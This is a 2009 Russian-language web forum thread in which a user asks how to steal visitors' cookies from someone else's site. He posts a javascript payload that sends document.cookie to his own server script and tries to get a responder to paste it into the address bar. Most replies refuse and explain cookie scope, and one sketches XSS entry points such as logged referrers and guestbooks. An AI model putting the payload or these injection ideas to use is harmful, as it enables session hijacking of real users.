|
|
|
| Как сделать так, чтобы на нужном мне сайте у человека сработал код:
javascript:document.write(document.cookie);
Надо вытащить его куки! Как это сделать?
Но не просто так просить его в адресной строке вставить код, а какой-то другой способ.
И чтобы результат через форму на php скрипте на емейл скинуло!
**********************
Вот есть уже готовый пример:
<a href='#' onclick="javascript:location.href='http://www.zeos.ho.ua/script.php?cookie='+document.cookie+''">Ссылка</a>
Отсылает куки сайта где ссылка была запущена мне на емейл, но как быть если я такую ссылку на сайте "X" не могу прописать!
Какие есть варианты?
Надо сделать такой скрипт чтобы если челвек заходит на мой сайт по ссылке, то в index.html был уже прописан скрипт который сразу же летит на сайт "X" (не мой сайт) и как бы под пользователем вытаскивает (+document.cookie+) куки? Ну а дальше я сам уже смогу понять как мне на мой скрипт переправить куки.
Очень прошу разьяснить реально ли такое сделать и какие возможные способы есть!
С МЕНЯ --> МНОГО ПИВА | |
|
|
|
|
|
|
|
для: ZEOS
(06.05.2009 в 21:08)
| | Начнём с самого начала:
1. Куки конкретного пользователя хранятся на жёстком диске компьютера этого пользователя.
2. Куки появляются у конкретного пользователя не просто так (сами по себе) - их прописывают конкретные сайты в виде текстового ASCII-файла, получающего имя, связанное с доменным именем этого самого конретного сайта.
3. Прочитать куки (один конкретный файл) может только тот сайт, который эти самые куки и установил.
Вы что именно хотите?
1. Хотите прочитать со своего сайта куки, созданные вашим же сайтом и передать их содержимое себе на сервер для сохранения?
Это вообще-то бред, но с реализацией нет особых проблем - куки СРАЗУ же автоматом передаются в HTTP-заголовке и на сервере их спокойно можно сохранить и разобрать.
2. Хотите прочитать со своего сайта куки, созданные ЧУЖИМИ сайтами?
Это - нелигитимное дело, ибо это - частная информация.
Прямым путём сделать этого НЕЛЬЗЯ.
Ну а хакерские методы здесь, на этом форуме, не обсуждаются.
Хакеры, для сведения, обычно не заморачиваются с куками, а воруют с компа сразу файл index.dat - там в сжатом виде не только куки, но и логины и пароли ко всем сайтам, на которых юзер их использовал :-) | |
|
|
|
|
|
|
|
для: PAT
(06.05.2009 в 21:49)
| | РАТ, спорить не буду, просто в адресной строке где сейчас у Вас написано примерно такое:
http://softtime.ru/forum/read.php?id_forum=4&id_theme=64900&page=1
Вставьте:
javascript:location.href='http://www.zeos.ho.ua/script.php?cookie='+document.cookie+''
| и нажмите ентер, после я в личку Вам вышлю ваши куки :) | |
|
|
|
|
|
|
|
для: ZEOS
(06.05.2009 в 22:02)
| | . | |
|
|
|
|
|
|
|
для: ZEOS
(06.05.2009 в 22:02)
| | ого-го! оригинальненько.
сравнили пиво с пылесосом.
в теме у Вас один вопрос, а спрашиваете потом совсем другое.
>но как быть если я такую ссылку на сайте "X" не могу прописать!
повесьте такую функцию на кнопку, изображение, тело документа, да что угодно. только "прописать" все равно придеться... | |
|
|
|
|
|
|
|
для: ddhvvn
(06.05.2009 в 22:46)
| | >ого-го! оригинальненько.
>сравнили пиво с пылесосом.
Какой еще пилесос? Закусывать надо :)
>в теме у Вас один вопрос, а спрашиваете потом совсем другое.
Снова не понятно про что Вы говорите?!
>
>>но как быть если я такую ссылку на сайте "X" не могу прописать!
>повесьте такую функцию на кнопку, изображение, тело документа, да что угодно. только "прописать" все равно придеться...
Кнопку создать не могу, изображение могу только закачать, тело документа не могу менять (сайт не мой)
Говорят можно в GIF картинку вставить HTML или JS и браузер Експлорер код прочитает код картинки как JS или HTML, но у меня что-то не получилось такое | |
|
|
|
|
|
|
|
для: ZEOS
(06.05.2009 в 23:15)
| | >Кнопку создать не могу, изображение могу только закачать, тело документа не могу менять (сайт не мой)
>Говорят можно в GIF картинку вставить HTML или JS и браузер Експлорер код прочитает код картинки как JS или HTML, но у меня что-то не получилось такое
??? Уверены? Может речь идет о пути к картинке?
Если так, то даже если Вы зададите "вычурное" имя, ничего у Вас не получится...
Вперед, кулхацкеры! | |
|
|
|
|
|
|
|
для: ddhvvn
(06.05.2009 в 23:47)
| | Я все верно написал: JS в GIF
Может Вы впервые слышите, что уже вирусы прописывают в картинки?
Тогда вот Вам картинка, откройте, но без обид потом:
http://yehoshua-m.com/images/car2.gif | |
|
|
|
|
|
|
|
для: ZEOS
(06.05.2009 в 23:55)
| | Никакого вируса в этой картинке нет - этот файл формата gif отдаёт строку
<img src="WorleyVision5.jpg">
| , которая показывает довольно симпатичную машинку.
Настроить свой сервер так, чтобы вместо картинки gif отдавал HTML-код, может всякий, имеющий доступ к .htaccess-файлу своего сервера. На бесплатных сайтах этого обычно нельзя делать.
Хотя, если правильно помню, на холм.ру таковое допускается. | |
|
|
|
|
|
|
|
для: ZEOS
(06.05.2009 в 22:02)
| | Я могу просто вставить
javascript:alert(document.cookie)
| , посмотреть на alert и тем самым избавить вас от необходимости что-то "посылать мне в личку":-)
Ещё раз прочтите то, что я выше написал - прочитать куки может только тот сайт, который эти куки и поставил.
Задача ваша плавно перетекает в другую задачу - и формулируется она очень просто: "как мне
внедрить какой-то мой скриптовой код на чужую страницу?"
Отвечаю: вы сможете это сделать лишь в том случае, если хозяином сайта такая возможность -
внедрять чужой скриптовой код - предусмотрена.
Например, некоторые сайты сохраняют реферреры (т.е. учитывают ссылающиеся на них
страницы). Когда применяется не очень грамотный серверный скрипт для этого, можно
под видом реферрера внедрить свою JS-строку, которая и сделает всё то, что вам нужно
(при этом совсем не обязательно посетителю на что-то кликать).
Или, если хозяином сайта на гостевой книге/форуме используется несовершенный движок,
пропускающий скриптовые теги, то на такой гостевой/форуме тоже можно "похулиганить".
На прочие сайты если и можно "внедриться", то только используя уже совершенно иные методы -
хакерские. О которых я по понятным причинам здесь распространяться не буду. | |
|
|
|
|
|
|
|
для: PAT
(06.05.2009 в 23:57)
| | PAT, Вы могли бы сказать свой ICQ, очень хочу пообщаться! Если конечно у Вас есть желание :) | |
|
|
|
|
|
|
|
для: ZEOS
(07.05.2009 в 00:06)
| | У вас, как я понимаю, есть очень большая "куча" идей? :-))
И, вместе с этим, у вас очень мало возможностей хоть что-то из этих идей реализовать, так? :-((
Э-хе-хе...
Всё уже давно придумано... и придумано не вами... и всё придуманное кем-то уже реализовано... | |
|
|
|
|
|
|
|
для: ZEOS
(07.05.2009 в 00:06)
| | Я думаю, Вам лучше на специализированные хакерские сайты, там это все разжевано по буковкам... | |
|
|
|
|
|
|
|
для: GeorgeIV
(07.05.2009 в 10:45)
| | Да уже весь xakep.ru перечитал, ничего стоящего, бред не рабочий
Очень нужна помощь Ваша! Мне этот форум советовали, так как тут действительно хорошие и умелые люди есть :) | |
|
|
|
|
|
|
|
для: ZEOS
(07.05.2009 в 14:48)
| | Никто Вам тут помогать ломать не будет. По крайней мере из здравомыслящих.
А так может кто-то найдется, кто чиркнет Вам на мыло (или еще как-то найдет) и Вы будете вершить Великие дела вместе! ;) | |
|
|
|
|
|
|
|
для: ZEOS
(07.05.2009 в 14:48)
| | Тут хотя и пишут что куки может принять только тот сервер, который их установил, но это не совсем так. Я заходил на какой-то анонимайзер, так он смог каким-то образом считать все мои куки мог их удалять и редактировать. А ссылку надо еще закодировать, а то палево... | |
|
|
|
|
|
|
|
для: Skinhead
(11.05.2009 в 03:47)
| | >Я заходил на какой-то анонимайзер, так он смог каким-то образом считать все мои куки мог их удалять и редактировать.
А пятку он вам не почесал, анонимайзер этот? :-)
Ссылку на этот чудный анонимайзер - в студию! | |
|
|
|
|
|
|
|
для: PAT
(11.05.2009 в 04:33)
| | http://www.hackzone.ru/tools/proxy/ если его нет тут, то искать в гугл | |
|
|
|